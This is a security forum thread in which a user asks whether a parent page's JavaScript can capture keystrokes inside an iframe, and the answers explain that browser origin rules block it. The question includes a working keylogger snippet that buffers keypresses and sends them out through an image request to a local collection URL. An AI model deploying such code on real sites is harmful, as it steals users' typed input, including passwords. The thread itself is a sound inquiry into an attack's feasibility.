Can a javascript on parent page log keystrokes inside an iframe?

Question

I am trying to analyze the possibility of accessing keystrokes from an iframe using a javascript running on the parent page. The potential attack which I am looking to verify is Cross Frame Scripting.

From the OWASP page, I read that the listener in parent page would get notified only if the keystroke events are from the parent page itself and not the iframe.

Is that always the case?
If the framed content is of same origin, would any of the browsers behave differently?
I have confirmed on Chrome that this attack doesn't work. But is there any alternate way to perform this attack?

This is the javascript running on my parent.

var keys='';
var url = 'http://localhost:8883/key?c=';

document.onkeypress = function(e) {
    get = window.event?event:e;
    key = get.keyCode?get.keyCode:get.charCode;
    key = String.fromCharCode(key);
    keys+=key;
}
window.setInterval(function(){
    if(keys.length>0) {
        new Image().src = url+keys;
        keys = '';
    }
}, 1000);

If you could get data back and forth from iframe on user side that would be a huge security flaw. — Raimonds Liepiņš, Aug 15 '19 at 12:35

score 1 · Answer 1 · answered Aug 15 '19 at 04:31

1

1)Yes

2) No (although plugins could in theory alter this behaviour, but I do not know of any myself)

3)Unless there is a vulnerability exploited in a browser that is yet to be patched, or the use of a malicious/rogue browser, then no you cannot

answered Aug 15 '19 at 04:31

ISMSDEV

3,272
12
22

1

With a subscript on all the answers that a user can alter options in most (all?) browsers to disable frame protection – LTPCGO Sep 15 '19 at 03:41

Can a javascript on parent page log keystrokes inside an iframe?

1 Answers1